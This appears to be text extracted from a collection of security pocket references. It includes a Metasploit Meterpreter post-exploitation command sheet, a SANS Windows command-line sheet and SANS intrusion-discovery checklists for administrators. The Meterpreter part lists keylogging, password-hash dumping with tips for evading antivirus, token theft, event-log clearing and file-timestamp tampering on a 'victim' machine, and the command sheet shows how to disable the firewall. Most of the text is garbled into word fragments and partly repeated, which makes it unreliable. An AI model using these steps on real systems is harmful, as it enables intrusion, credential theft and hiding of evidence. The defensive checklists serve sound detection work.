ss ID
th
at M
ete
rpre
ter
is
run
nin
g in
sid
e
getuid:
Dis
pla
y th
e u
se
r ID
th
at M
ete
rpre
ter
is
run
nin
g w
ith
ps:
Dis
pla
y p
roce
ss lis
t
kill:
Te
rmin
ate
a p
roce
ss g
ive
n its
pro
ce
ss ID
execute:
Ru
n a
giv
en
pro
gra
m w
ith
th
e p
rivile
ge
s
of
the
pro
ce
ss th
e M
ete
rpre
ter
is lo
ad
ed
in
migrate:
Ju
mp
to
a g
ive
n d
estin
atio
n p
roce
ss ID
- Ta
rge
t p
roce
ss m
ust
ha
ve
sa
me
or
lesse
r p
rivile
ges
- Ta
rge
t p
roce
ss m
ay b
e a
mo
re s
tab
le p
roce
ss
- W
hen
insid
e a
pro
ce
ss, ca
n a
cce
ss a
ny file
s th
at
pro
ce
ss h
as a
lo
ck o
n
Ne
two
rk C
om
ma
nd
s:
ipconfig:
Sh
ow
ne
two
rk in
terf
ace
info
rma
tio
n
portfwd:
Fo
rwa
rd p
acke
ts th
rou
gh
TC
P s
essio
n
route:
Ma
na
ge
/vie
w th
e s
yste
m's
ro
utin
g ta
ble
Mis
c C
om
ma
nd
s:
idletime:
Dis
pla
y th
e d
ura
tio
n th
at
the
GU
I o
f th
e
targ
et m
ach
ine
ha
s b
ee
n id
le
uictl [enable/disable]
[keyboard/mouse]:
En
ab
le/d
isa
ble
eith
er
the
mo
use
or
ke
yb
oa
rd o
f th
e t
arg
et m
ach
ine
screenshot:
Sa
ve
as a
n im
ag
e a
scre
en
sh
ot o
f
the
ta
rge
t m
ach
ine
Ad
ditio
na
l M
od
ule
s:
use [module]:
Lo
ad
th
e s
pe
cifie
d m
od
ule
Exa
mp
le:
use priv:
Lo
ad
th
e p
riv m
od
ule
hashdump:
Du
mp
th
e h
ash
es fro
m t
he
bo
x
timestomp:
Alte
r N
TF
S f
ile
tim
esta
mp
s
Me
tas
plo
it M
ete
rpre
ter
Ba
se
Co
mm
an
ds:
? / help:
Dis
pla
y a
sum
mary
of
co
mm
an
ds
exit / quit:
Exit t
he
Me
terp
rete
r se
ssio
n
sysinfo:
Sh
ow
th
e s
yste
m n
am
e a
nd
OS
typ
e
shutdown / reboot:
Se
lf-e
xp
lan
ato
ry
File
Syste
m C
om
ma
nd
s:
cd:
Ch
an
ge
dir
ecto
ry
lcd:
Ch
an
ge
dir
ecto
ry o
n lo
ca
l (a
tta
cke
r's)
ma
ch
ine
pwd / getwd:
Dis
pla
y c
urr
en
t w
ork
ing
dir
ecto
ry
ls:
Sho
w th
e c
on
tents
of
the d
irecto
ry
cat:
Dis
pla
y th
e c
on
ten
ts o
f a
file
on
scre
en
download / upload:
Mo
ve
file
s to
/fro
m t
he
ta
rge
t
ma
ch
ine
mkdir / rmdir:
Make
/ r
em
ove
dir
ecto
ry
edit:
Op
en
a f
ile
in th
e d
efa
ult e
dito
r (t
yp
ica
lly v
i)
51 59
Metasploit Cheat Sheet
Step 1: Core Commands
At its most basic use, meterpreter is a Linux terminal on the victim's computer. As such, many of our basic Linux commands can be used on the meterpreter even if it's on a Windows or other operating system.
Here are some of the core commands we can use on the meterpreter.
• ? - help menu
• background - moves the current session to the background
• bgkill - kills a background meterpreter script
• bglist - provides a list of all running background scripts
• bgrun - runs a script as a background thread
• channel - displays active channels
• close - closes a channel
• exit - terminates a meterpreter session
• help - help menu
• interact - interacts with a channel
• irb - go into Ruby scripting mode
• migrate - moves the active process to a designated PID
• quit - terminates the meterpreter session
• read - reads the data from a channel
• run - executes the meterpreter script designated after it
• use - loads a meterpreter extension
• write - writes data to a channel
Step 2: File System Commands • cat - read and output to stdout the contents of a file
• cd - change directory on the victim
• del - delete a file on the victim
• download - download a file from the victim system to the attacker system
• edit - edit a file with vim
• getlwd - print the local directory
• getwd - print working directory
• lcd - change local directory
• lpwd - print local directory
• ls - list files in current directory
• mkdir - make a directory on the victim system
• pwd - print working directory
• rm - delete a file
• rmdir - remove directory on the victim system
• upload - upload a file from the attacker system to the victim
Step 3: Networking Commands • ipconfig - displays network interfaces with key information including IP address, etc.
• portfwd - forwards a port on the victim system to a remote service
• route - view or modify the victim routing table
Step 4: System Commands • clearav - clears the event logs on the victim's computer
5260
• drop_token - drops a stolen token
• execute - executes a command
• getpid - gets the current process ID (PID)
• getprivs - gets as many privileges as possible
• getuid - get the user that the server is running as
• kill - terminate the process designated by the PID
• ps - list running processes
• reboot - reboots the victim computer
• reg - interact with the victim's registry
• rev2self - calls RevertToSelf() on the victim machine
• shell - opens a command shell on the victim machine
• shutdown - shuts down the victim's computer
• steal_token - attempts to steal the token of a specified (PID) process
• sysinfo - gets the details about the victim computer such as OS and name
Step 5: User Interface Commands • enumdesktops - lists all accessible desktops
• getdesktop - get the current meterpreter desktop
• idletime - checks to see how long since the victim system has been idle
• keyscan_dump - dumps the contents of the software keylogger
• keyscan_start - starts the software keylogger when associated with a process such as Word or
browser
• keyscan_stop - stops the software keylogger
• screenshot - grabs a screenshot of the meterpreter desktop
• set_desktop - changes the meterpreter desktop
• uictl - enables control of some of the user interface components
Step 6: Privilege Escalation Commands • getsystem - uses 15 built-in methods to gain sysadmin privileges
Step 7: Password Dump Commands • hashdump - grabs the hashes in the password (SAM) file
Note that hashdump will often trip AV software, but there are now two scripts that are more stealthy, "run hashdump" and "run smart_hashdump". Look for more on those on my upcoming meterpreter script cheat sheet.
Step 8: Timestomp Commands • timestomp - manipulates the modify, access, and create attributes of a file
5361
WM
IC
Fund
amen
tal g
ram
mar
: C:\> wmic [alias] [where clause] [verb
clause]
Use
ful [aliases]:
process
share
startup
service
nicconfig
useraccount
qfe (Q
uick
Fix
Eng
inee
ring
– sh
ows
patc
hes)
Ex
ampl
e [where clauses]:
where name="nc.exe"
where (commandline like "%stuff")
where (name="cmd.exe" and
parentprocessid!="[pid]")
Exam
ple [verb clauses]:
list [full|brief]
get [attrib1,attrib2…]
call [method]
delete
List
all
attr
ibut
es o
f [alias]:
C:\> wmic [alias] get /?
List
all
calla
ble
met
hods
of [alias]:
C:\> wmic [alias] call /?
Exam
ple:
Li
st a
ll at
trib
utes
of
all r
unni
ng p
roce
sses
: C:\> wmic process list full
Mak
e W
MIC
eff
ect
rem
ote [TargetIPaddr]:
C:\> wmic /node:[TargetIPaddr]
/user:[User] /password:[Passwd] process
list full
Reg
Com
man
d
Addi
ng K
eys
and
Valu
es:
C:\> reg add
[\\TargetIPaddr\][RegDomain]\[Key]
Ad
d a
key
to t
he r
egis
try
on m
achi
ne
[TargetIPaddr] w
ithin
the
regi
stry
dom
ain
[RegDomain] t
o lo
catio
n [Key]. I
f no
rem
ote
mac
hine
is s
peci
fied,
the
cur
rent
mac
hine
is
assu
med
.
Expo
rt a
nd I
mpo
rt:
C:\> reg export [RegDomain]\[Key]
[FileName]
Ex
port
all
subk
eys
and
valu
es lo
cate
d in
the
dom
ain
[RegDomain] u
nder
the
loca
tion [Key] t
o th
e fil
e [FileName]
C:\> reg import [FileName]
Im
port
all
regi
stry
ent
ries
from
the
file
[FileName]
Im
port
and
exp
ort
can
only
be
done
fro
m o
r to
the
loca
l mac
hine
.
Que
ry fo
r a
spec
ific
Valu
e of
a K
ey:
C:\> reg query
[\\TargetIPaddr\][RegDomain]\[Key] /v
[ValueName]
Q
uery
a k
ey o
n m
achi
ne [TargetIPaddr] w
ithin
th
e re
gist
ry d
omai
n [RegDomain] in
loca
tion
[Key] a
nd g
et th
e sp
ecifi
c va
lue [ValueName]
unde
r th
at k
ey.
Add
/s t
o re
curs
e al
l val
ues.
Win
do
ws
Co
mm
an
d L
ine
C
he
at
Sh
ee
t B
y Ed
Sko
udis
POC
KET
REF
EREN
CE
GU
IDE
ht
tp://
www.
sans
.org
Proc
ess
and
Serv
ice
Info
rmat
ion
Li
st a
ll pr
oces
ses
curr
ently
runn
ing:
C:\> tasklist
List
all
proc
esse
s cu
rren
tly r
unni
ng a
nd t
he D
LLs
each
has
load
ed:
C:\> tasklist /m
Li
sts
all p
roce
sses
cur
rent
ly r
unni
ng w
hich
hav
e th
e sp
ecifi
ed [dll] l
oade
d:
C:\> tasklist /m [dll]
Li
st a
ll pr
oces
ses
curr
ently
run
ning
and
the
ser
vice
s ho
sted
in t
hose
pro
cess
es:
C:\> tasklist /svc
Q
uery
brie
f st
atus
of
all s
ervi
ces:
C:\> sc query
Q
uery
the
con
figur
atio
n of
a s
peci
fic s
ervi
ce:
C:\> sc qc [ServiceName]
Purp
ose
The
purp
ose
of t
his
chea
t sh
eet
is t
o pr
ovid
e tip
s on
how
to
use
vario
us W
indo
ws
com
man
d th
at a
re f
requ
ently
ref
eren
ced
in
SAN
S 50
4, 5
17, 5
31, a
nd 5
60.
54 62
File
Sea
rch
and
Cou
ntin
g Li
nes
Sear
ch d
irect
ory
stru
ctur
e fo
r a
file
in a
spe
cific
di
rect
ory:
C:\> dir /b /s [Directory]\[FileName]
Coun
t th
e nu
mbe
r of
line
s on
Sta
ndar
dOuy
of
[Command]:
C:\> [Command] | find /c /v ""
Find
s th
e co
unt
(/c)
of
lines
tha
t do
not
con
tain
(/v)
no
thin
g ("
").
Line
s th
at d
o no
t ha
ve n
othi
ng a
re a
ll lin
es, e
ven
blan
k lin
es, w
hich
con
tain
CR/
LF
Invo
king
Use
ful G
UIs
at t
he C
omm
and
Line
Loca
l Use
r M
anag
er (
incl
udes
gro
up m
anag
emen
t):
C:\> lusrmgr.msc
Serv
ices
Con
trol
Pan
el:
C:\> services.msc
Task
Man
ager
: C:\> taskmgr.exe
Secu
rity
Polic
y M
anag
er:
C:\> secpol.msc
Even
t Vi
ewer
: C:\> eventvwr.msc
Cont
rol P
anel
: C:\> control
Clos
e G
UI
win
dow
s by
hitt
ing
Alt-
F4
Com
man
d Li
ne F
OR
Loo
ps
Coun
ting
Loop
: C:\> for /L %i in
([start],[step],[stop]) do [command]
Set %i t
o an
initi
al v
alue
of [
start] a
nd in
crem
ent
it by
[step] a
t ev
ery
itera
tion
until
its
valu
e is
equ
alto
[stop]. F
or e
ach
itera
tion,
run
[command]. T
heite
rato
r va
riabl
e %i ca
n be
use
d an
ywhe
re in
the
com
man
d to
rep
rese
nt it
s cu
rren
t val
ue.
Iter
ate
over
file
con
tent
s:
C:\> for /F %i in ([file-set]) do
[command]
Iter
ate
thro
ugh
the
cont
ents
of
the
file
on a
line
-by-
lin
e ba
sis.
For
eac
h ite
ratio
n, s
tore
the
con
tent
s of
th
e lin
e in
to %i a
nd r
un [command].
Shut
dow
n an
d R
esta
rt
Shut
dow
n W
indo
ws
imm
edia
tely
: C:\> shutdown /s /t 0
Not
e: C
omm
and
may
not
pow
er d
own
the
hard
war
e.
Rest
art
Win
dow
s im
med
iate
ly:
C:\> shutdown /r /t 0
Abor
t sh
utdo
wn/
rest
art c
ount
dow
n:
C:\> shutdown /a
Turn
off
bui
lt-in
Win
dow
s fir
ewal
l: C:\> netsh firewall set opmode disable
Conf
igur
e in
terf
ace
“Loc
al A
rea
Conn
ectio
n” w
ith
[IPaddr] [Netmask] [DefaultGW]:
C:\> netsh interface ip set address
local static [IPaddr] [Netmask]
[DefaultGW] 1
Conf
igur
e D
NS
serv
er f
or “
Loca
l Are
a Co
nnec
tion”
: C:\> netsh interface ip set dns local
static [IPaddr]
Conf
igur
e in
terf
ace
to u
se D
HCP
: C:\> netsh interface ip set address
local dhcp
Inte
ract
ing
with
the
Net
wor
k U
sing
Net
sh
Use
ful N
etst
at S
ynta
x
Show
all
TCP
and
UD
P po
rt u
sage
and
pro
cess
ID
: C:\> netstat –nao
Look
for
usa
ge o
f po
rt [port] ev
ery [N] s
econ
ds:
C:\> netstat –nao [N] | find [port]
Dum
p de
taile
d pr
otoc
ol s
tatis
tics:
C:\> netstat –s –p [tcp|udp|ip|icmp]
Inst
allin
g B
uilt-
in P
acka
ges
on V
ista
Inst
all t
elne
t se
rvic
e on
Vis
ta:
C:\> pkgmgr /iu:"TelnetServer"
Inst
all t
elne
t cl
ient
on
Vist
a:
C:\> pkgmgr /iu:"TelnetClient"
Inst
all I
IS o
n Vi
sta:
C:\> pkgmgr /iu:IIS-WebServerRole;WAS-
WindowsActivationService;WAS-
ProcessModel; WAS-NetFxEnvironment;WAS-
ConfigurationAPI
To r
emov
e an
y of
the
se p
acka
ges,
rep
lace
inst
all
upda
te (
/iu)
with
uni
nsta
ll up
date
(/u
u)
55 63
To look a
t lo
gs,
run t
he W
indow
s event
vie
wer:
C:\> eventvwr.msc
Or,
invoke t
he e
vent
vie
wer
by g
oin
g t
o:
Sta
rt
Pro
gra
ms
Adm
inis
trative T
ools
Event
Vie
wer
Look f
or
susp
icio
us
events
, su
ch a
s:
“Event
log s
erv
ice w
as
stopped.”
“Win
dow
s File
Pro
tect
ion is
not
act
ive o
n t
his
sy
stem
.”
"The p
rote
cted S
yst
em
file
[file
nam
e]
was
not
rest
ore
d t
o its
origin
al, v
alid
vers
ion
beca
use
the W
indow
s File
Pro
tect
ion..."
“The M
S T
eln
et
Serv
ice h
as
start
ed
succ
ess
fully
.”
Look f
or
larg
e n
um
ber
of
faile
d logon
att
em
pts
or
lock
ed o
ut
acc
ounts
.
Syst
em
Adm
inis
trato
rs a
re o
ften o
n t
he f
ront
lines
of
com
pute
r se
curity
. This
guid
e a
ims
to s
upport
Syst
em
Adm
inis
trato
rs in f
indin
g
indic
ations
of
a s
yst
em
com
pro
mis
e.
The f
ollo
win
g t
ools
are
not
built
into
the W
indow
s opera
ting s
yst
em
, but
can b
e u
sed t
o a
naly
ze its
se
curity
sta
tus
in m
ore
deta
il.
Each
is
availa
ble
for
free d
ow
nlo
ad a
t th
e lis
ted w
eb s
ite.
DIS
CLA
IME
R:
Th
e S
AN
S I
nsti
tute
is n
ot
resp
on
sib
le f
or
cre
ati
ng
, d
istr
ibu
tin
g,
wa
rra
nti
ng
, o
r su
pp
ort
ing
an
y o
f th
e f
ollo
win
g
too
ls.
Tools
for
mappin
g lis
tenin
g T
CP/U
DP p
ort
s to
the
pro
gra
m lis
tenin
g o
n t
hose
port
s:
Fport
– c
om
mand-lin
e t
ool at
ww
w.foundst
one.c
om
TCPVie
w –
GU
I to
ol at
ww
w.m
icro
soft
.com
/tech
net/
sysi
nte
rnals
Pro
cess
analy
sis
tools
fro
m t
he W
indow
s 2000
Reso
urc
e K
it -
- htt
p:/
/support
.mic
roso
ft.c
om
/kb/9
27229:
pulis
t – s
how
s use
r nam
e a
ssoci
ate
d w
ith e
ach
ru
nnin
g p
roce
ss
pst
at
– s
how
s deta
iled p
roce
ss s
tatist
ics,
in
cludin
g n
am
e, Pid
, m
em
ory
, etc
.
Additio
nal Pro
cess
Analy
sis
Tools
: Pro
cess
Explo
rer
– G
UI
tool at
ww
w.m
icro
soft
.com
/tech
net/
sysi
nte
rnals
Task
Man+
--
GU
I to
ol at
htt
p:/
/ww
w.d
iam
ondcs
.com
.au
The C
ente
r fo
r In
tern
et
Secu
rity
has
rele
ase
d v
arious
Win
dow
s se
curity
tem
pla
tes
and s
ecu
rity
sco
ring
tools
for
free a
t w
ww
.cis
ecu
rity
.org
.
Un
us
ua
l L
og
En
trie
s
Ad
dit
ion
al
Su
pp
ort
ing
To
ols
Pu
rpo
se
Ho
w T
o U
se
Th
is S
he
et
On a
periodic
basi
s (d
aily
, w
eekly
, or
each
tim
e y
ou
logon t
o a
syst
em
you m
anage,)
run t
hro
ugh t
hese
quic
k s
teps
to look f
or
anom
alo
us
behavio
r th
at
mig
ht
be c
ause
d b
y a
com
pute
r in
trusi
on. Each
of
these
com
mands
runs
loca
lly o
n a
syst
em
.
Th
is s
he
et
is s
pli
t in
to t
hese
se
cti
on
s:
•U
nusu
al Pro
cess
es
and S
erv
ices
•U
nusu
al File
s and R
eg K
eys
•U
nusu
al N
etw
ork
Usa
ge
•U
nusu
al Sch
edule
d T
ask
s•
Unusu
al Acc
ounts
•U
nusu
al Log E
ntr
ies
•O
ther
Unusu
al It
em
s•
Additio
nal Support
ing T
ools
In
tru
sio
n D
isc
ove
ry
Ch
eat S
heet v2.0
Win
do
ws
20
00
PO
CK
ET
REFER
EN
CE G
UID
E
SA
NS
In
stit
ute
ht
tp://
ww
w.s
ans.
org
http
://is
c.sa
ns.o
rg
Dow
nloa
d th
e la
test
ver
sion
of t
his
shee
t fro
m
http
://w
ww
.san
s.or
g/re
sour
ces/
win
2ksa
chea
tshe
et.p
df
If y
ou
sp
ot
an
om
alo
us b
eh
av
ior:
DO
NO
T P
AN
IC!
Yo
ur
syste
m m
ay o
r m
ay n
ot
ha
ve
co
me
un
de
r a
tta
ck.
Ple
ase
co
nta
ct
the
In
cid
ent
Ha
ndlin
g T
ea
m
imm
ed
iate
ly to
rep
ort
th
e a
ctivitie
s a
nd
get
furt
he
r
assis
tan
ce
.
Oth
er
Un
us
ua
l It
em
s
Look f
or
unusu
ally
slu
ggis
h p
erf
orm
ance
and a
single
unusu
al pro
cess
hoggin
g t
he C
PU
: Task
M
anager
Pro
cess
and P
erf
orm
ance
tabs
Look f
or
unusu
al sy
stem
cra
shes,
beyond t
he n
orm
al
level fo
r th
e g
iven s
yst
em
.
56 64
Look a
t file
share
s, a
nd m
ake s
ure
each
has
a
defined b
usi
ness
purp
ose
:
C:\> net view \\127.0.0.1
Look a
t w
ho h
as
an o
pen s
ess
ion w
ith t
he m
ach
ine:
C:\> net session
Look a
t w
hic
h s
ess
ions
this
mach
ine h
as
opened w
ith
oth
er
syst
em
s:
C:\> net use
Look a
t N
etB
IOS o
ver
TCP/I
P a
ctiv
ity:
C:\> nbtstat –S
Look f
or
unusu
al lis
tenin
g T
CP a
nd U
DP p
ort
s:
C:\> netstat –na
For
continuousl
y u
pdate
d a
nd s
crolli
ng o
utp
ut
of
this
com
mand e
very
5 s
eco
nds:
C:\> netstat –na 5
Win
dow
s XP a
nd 2
003 incl
ude t
he –
o f
lag f
or
show
ing o
wnin
g p
roce
ss id:
C:\> netstat –nao 5
Again
, you n
eed t
o u
nders
tand n
orm
al port
usa
ge f
or
the s
yst
em
and look f
or
devia
tions.
Un
us
ua
l S
ch
ed
ule
d T
as
ks
Look a
t sc
hedule
d t
ask
s on t
he loca
l host
by
runnin
g: C:\> at
Als
o, ch
eck
the s
chedule
d t
ask
s usi
ng t
he
Task
Manager,
invoked b
y g
oin
g t
o:
Sta
rt
Pro
gra
ms
Acc
ess
ories
Syst
em
Tools
Sch
edule
d T
ask
s
Look f
or
unusu
al sc
hedule
d t
ask
s, e
speci
ally
those
th
at
run a
s a u
ser
in t
he A
dm
inis
trato
r’s
gro
up, as
SYSTEM
, or
with a
bla
nk u
ser
nam
e.
Look f
or
unexpect
ed e
ntr
ies
in u
ser
auto
start
direct
ories:
C:\
Docu
ments
and
Sett
ings\
[use
r_nam
e]\
Sta
rt
Menu\P
rogra
ms\
Sta
rtU
p
C:\
Win
nt\
Pro
file
s\[u
ser_
nam
e]\
Sta
rt
Menu\P
rogra
ms\
Sta
rtU
p
Un
us
ua
l N
etw
ork
Us
ag
e
Un
us
ua
l A
cc
ou
nts
Look f
or
new
, unexpect
ed a
ccounts
in t
he
Adm
inis
trato
rs g
roup:
C:\> lusrmgr.msc
Clic
k o
n G
roups,
Double
Clic
k o
n A
dm
inis
trato
rs,
then c
heck
mem
bers
of
this
gro
up.
This
can a
lso b
e d
one a
t th
e c
om
mand p
rom
pt:
C:\> net user
C:\> net localgroup administrators
Look f
or
unusu
al/unexpect
ed p
roce
sses
by r
unnin
g
Task
Manager:
(Sta
rt
Run…
and t
ype taskmgr.exe)
Look f
or
unusu
al netw
ork
serv
ices
inst
alle
d:
C:\> net start
Look f
or
unusu
al st
art
ed n
etw
ork
serv
ices
(GU
I):
C:\> services.msc
You n
eed t
o b
e f
am
iliar
with t
he n
orm
al pro
cess
es
on
the m
ach
ine a
nd s
earc
h f
or
devia
tions
from
the
norm
.
Un
us
ua
l P
roc
es
se
s a
nd
Se
rvic
es
Check
file
space
usa
ge t
o look f
or
sudden m
ajo
r
decr
ease
s in
fre
e s
pace
, usi
ng t
he G
UI
(rig
ht-
clic
k o
n
part
itio
n),
or
type:
C:\> dir c:\
Look f
or
unusu
ally
big
file
s: S
tart
Searc
h
For
File
s of
Fold
ers
… S
earc
h O
ptions
Siz
e
At
Least
10000KB
Look f
or
stra
nge p
rogra
ms
refe
rred t
o in r
egis
try
keys
ass
oci
ate
d w
ith s
yst
em
sta
rt u
p:
HKLM
\Soft
ware
\Mic
roso
ft\W
indow
s\
Curr
entV
ers
ion\R
un
HKLM
\Soft
ware
\Mic
roso
ft\W
indow
s\
Curr
entV
ers
ion\R
unonce
HKLM
\Soft
ware
\Mic
roso
ft\W
indow
s\
Curr
entV
ers
ion\R
unonce
Ex
To c
heck
the r
egis
try, ru
n:
C:\> regedit.exe
Un
us
ua
l F
ile
s a
nd
Reg
istr
y K
eys
57 65
Check
your
logs
for
susp
icio
us
events
, su
ch a
s:
“E
vent
log s
erv
ice w
as
stopped.”
“Win
dow
s File
Pro
tect
ion is
not
act
ive o
n t
his
syst
em
.”
"The p
rote
cted S
yst
em
file
[file
nam
e]
was
not
rest
ore
d t
o its
origin
al, v
alid
vers
ion
beca
use
the W
indow
s File
Pro
tect
ion..."
“The M
S T
eln
et
Serv
ice h
as
start
ed
succ
ess
fully
.”
Look f
or
larg
e n
um
ber
of
faile
d logon
att
em
pts
or
lock
ed o
ut
acc
ounts
. To d
o t
his
usi
ng t
he G
UI,
run t
he W
indow
s eve
nt
vie
wer:
C:\> eventvwr.msc
Usi
ng t
he c
om
mand p
rom
pt:
C:\> eventquery.vbs | more
Or,
to f
ocu
s on a
part
icula
r event
log:
C:\> eventquery.vbs /L security
Syst
em
Adm
inis
trato
rs a
re o
ften o
n t
he f
ront
lines
of
com
pute
r se
curity
. This
guid
e a
ims
to s
upport
Syst
em
Adm
inis
trato
rs in f
indin
g
indic
ations
of
a s
yst
em
com
pro
mis
e.
The f
ollo
win
g t
ools
are
not
built
into
Win
dow
s opera
ting s
yst
em
but
can b
e u
sed t
o a
naly
ze s
ecu
rity
is
sues
in m
ore
deta
il.
Each
is
availa
ble
for
free
dow
nlo
ad a
t th
e lis
ted w
eb s
ite.
DIS
CLA
IME
R:
Th
e S
AN
S I
nsti
tute
is n
ot
resp
on
sib
le f
or
cre
ati
ng
, d
istr
ibu
tin
g,
wa
rra
nti
ng
, o
r su
pp
ort
ing
an
y o
f th
e f
ollo
win
g
too
ls.
Tools
for
mappin
g lis
tenin
g T
CP/U
DP p
ort
s to
the
pro
gra
m lis
tenin
g o
n t
hose
port
s:
Fport
– c
om
mand-lin
e t
ool at
ww
w.foundst
one.c
om
TCPVie
w –
GU
I to
ol at
ww
w.m
icro
soft
.com
/tech
net/
sysi
nte
rnals
Additio
nal Pro
cess
Analy
sis
Tools
:
Pro
cess
Explo
rer
– G
UI
tool at
ww
w.m
icro
soft
.com
/tech
net/
sysi
nte
rnals
Task
Man+
--
GU
I to
ol at
htt
p:/
/ww
w.d
iam
ondcs
.com
.au
The C
ente
r fo
r In
tern
et
Secu
rity
has
rele
ase
d v
arious
Win
dow
s se
curity
tem
pla
tes
and s
ecu
rity
sco
ring
tools
for
free a
t w
ww
.cis
ecu
rity
.org
.
Un
us
ua
l L
og
En
trie
s
Ad
dit
ion
al
Su
pp
ort
ing
To
ols
Pu
rpo
se
Ho
w T
o U
se
Th
is S
he
et
On a
periodic
basi
s (d
aily
, w
eekly
, or
each
tim
e y
ou
logon t
o a
syst
em
you m
anage,)
run t
hro
ugh t
hese
quic
k s
teps
to look f
or
anom
alo
us
behavio
r th
at
mig
ht
be c
ause
d b
y a
com
pute
r in
trusi
on. Each
of
these
com
mands
runs
loca
lly o
n a
syst
em
.
Th
is s
he
et
is s
pli
t in
to t
he
se
se
cti
on
s:
• U
nusu
al Pro
cess
es
and S
erv
ices
• U
nusu
al File
s and R
eg K
eys
• U
nusu
al N
etw
ork
Usa
ge
• U
nusu
al Sch
edule
d T
ask
s •
Unusu
al Acc
ounts
• U
nusu
al Log E
ntr
ies
• O
ther
Unusu
al It
em
s •
Additio
nal Support
ing T
ools
In
tru
sio
n D
isc
ove
ry
Ch
eat S
heet v2.0
Win
do
ws
XP
Pro
/
20
03
Se
rve
r /
Vis
ta
PO
CK
ET
REFER
EN
CE G
UID
E
SA
NS
In
stit
ute
w
ww
.san
s.or
g an
d is
c.sa
ns.o
rg
Dow
nloa
d th
e la
test
ver
sion
of t
his
shee
t fro
m
http
://w
ww
.san
s.or
g/re
sour
ces/
win
sach
eats
heet
If y
ou
sp
ot
an
om
alo
us b
eh
av
ior:
DO
NO
T P
AN
IC!
Yo
ur
syste
m m
ay o
r m
ay n
ot
ha
ve
co
me
un
de
r a
tta
ck.
Ple
ase
co
nta
ct
the
In
cid
ent
Ha
ndlin
g T
ea
m
imm
ed
iate
ly to
rep
ort
th
e a
ctivitie
s a
nd
get
furt
he
r
assis
tan
ce
.
Oth
er
Un
us
ua
l It
em
s
Look f
or
unusu
ally
slu
ggis
h p
erf
orm
ance
and a
si
ngle
unusu
al pro
cess
hoggin
g t
he C
PU
: Task
M
anager
Pro
cess
and P
erf
orm
ance
tabs
Look f
or
unusu
al sy
stem
cra
shes,
beyond t
he n
orm
al
level fo
r th
e g
iven s
yst
em
.
58 66
Look a
t file
share
s, a
nd m
ake s
ure
each
has
a d
efined b
usi
ness
purp
ose
:
C:\> net view \\127.0.0.1
Look a
t w
ho h
as
an o
pen s
ess
ion w
ith t
he m
ach
ine:
C:\> net session
Look a
t w
hic
h s
ess
ions
this
mach
ine h
as
opened w
ith o
ther
syst
em
s:
C:\> net use
Look a
t N
etB
IOS o
ver
TCP/I
P a
ctiv
ity:
C:\> nbtstat –S
Look for
unusu
al lis
tenin
g T
CP a
nd U
DP p
ort
s:
C:\> netstat –na
For
continuousl
y u
pdate
d a
nd s
crolli
ng o
utp
ut
of th
is c
om
mand
every
5 s
eco
nds:
C:\> netstat –na 5
The –
o fla
g s
how
s th
e o
wnin
g p
roce
ss id:
C:\> netstat –nao 5
The –
b fla
g s
how
s th
e e
xecu
table
nam
e a
nd t
he D
LLs
loaded for
the n
etw
ork
connect
ion.
C:\> netstat –naob 5
Note
that
the –
b fla
g u
ses
exce
ssiv
e C
PU
reso
urc
es.
Again
, you n
eed t
o u
nders
tand n
orm
al port
usa
ge for
the
syst
em
and look for
devia
tions.
Als
o c
heck
Win
dow
s Firew
all
configura
tion:
C:\> netsh firewall show config
Un
us
ua
l S
ch
ed
ule
d T
as
ks
Look f
or
unusu
al sc
hedule
d t
ask
s, e
speci
ally
those
th
at
run a
s a u
ser
in t
he A
dm
inis
trato
rs g
roup, as
SYSTEM
, or
with a
bla
nk u
ser
nam
e.
Usi
ng t
he G
UI,
run T
ask
Sch
edule
r:
Sta
rt
Pro
gra
ms
Acc
ess
ories
Syst
em
Tools
Sch
edule
d T
ask
s
Usi
ng t
he c
om
mand p
rom
pt:
C:\> schtasks
Check
oth
er
auto
start
ite
ms
as
well
for
unexpect
ed
entr
ies,
rem
em
bering t
o c
heck
use
r auto
start
direct
ories
and r
egis
try k
eys.
U
sing t
he G
UI,
run m
sconfig a
nd look a
t th
e
Sta
rtup t
ab:
Sta
rt
Run, msconfig.exe
Usi
ng t
he c
om
mand p
rom
pt:
C:\> wmic startup list full
Un
us
ua
l N
etw
ork
Us
ag
e
Un
us
ua
l A
cc
ou
nts
Look f
or
new
, unexpect
ed a
ccounts
in t
he A
dm
inis
trato
rs
gro
up:
C:\> lusrmgr.msc
Clic
k o
n G
roups,
Double
Clic
k o
n A
dm
inis
trato
rs,
then
check
mem
bers
of
this
gro
up.
This
can a
lso b
e d
one a
t th
e c
om
mand p
rom
pt:
C:\> net user
C:\> net localgroup administrators
Look for
unusu
al/unexpect
ed p
roce
sses,
and focu
s on p
roce
sses
with U
ser
Nam
e “
SYSTEM
” or
“Adm
inis
trato
r” (
or
use
rs in t
he
Adm
inis
trato
rs' gro
up).
You n
eed t
o b
e fam
iliar
with n
orm
al
pro
cess
es
and s
erv
ices
and s
earc
h for
devi
ations.
U
sing t
he G
UI,
run T
ask
Manager:
C:\> taskmgr.exe
Usi
ng t
he c
om
mand p
rom
pt:
C:\> tasklist
C:\> wmic process list full
Als
o look for
unusu
al se
rvic
es.
U
sing t
he G
UI:
C:\> services.msc
Usi
ng t
he c
om
mand p
rom
pt:
C:\> net start
C:\> sc query
For
a lis
t of se
rvic
es
ass
oci
ate
d w
ith e
ach
pro
cess
:
C:\> tasklist /svc
Un
us
ua
l P
roc
es
se
s a
nd
Se
rvic
es
Check
file
space
usa
ge t
o look for
sudden m
ajo
r decr
ease
s in
fre
e
space
, usi
ng t
he G
UI
(rig
ht-
clic
k on p
art
itio
n),
or
type:
C:\> dir c:\
Look for
unusu
ally
big
file
s: S
tart
Searc
h
For
File
s of Fold
ers
…
Searc
h O
ptions
Siz
e
At
Least
10000KB
Look for
stra
nge p
rogra
ms
refe
rred t
o in r
egis
try k
eys
ass
oci
ate
d
with s
yst
em
sta
rt u
p:
H
KLM
\Soft
ware
\Mic
roso
ft\W
indow
s\Curr
entV
ers
ion\R
un
H
KLM
\Soft
ware
\Mic
roso
ft\W
indow
s\Curr
entV
ers
ion\R
unonce
HKLM
\Soft
ware
\Mic
roso
ft\W
indow
s\Curr
entV
ers
ion\R
unonce
Ex
Note
that
you s
hould
als
o c
heck
the H
KCU
counte
rpart
s (r
epla
ce
HKLM
with H
KCU
above).
U
sing t
he G
UI:
C:\> regedit
Usi
ng t
he c
om
mand p
rom
pt:
C:\> reg query <reg key>
Un
us
ua
l F
ile
s a
nd
Reg
istr
y K
eys
59 67
68
Windows Security Log
Quick Reference
4720
4722
4723
4724
4725
4726
4738
4740
4767
4781
Created
Enabled
Disabled
Deleted
Changed
Locked out
Unlocked
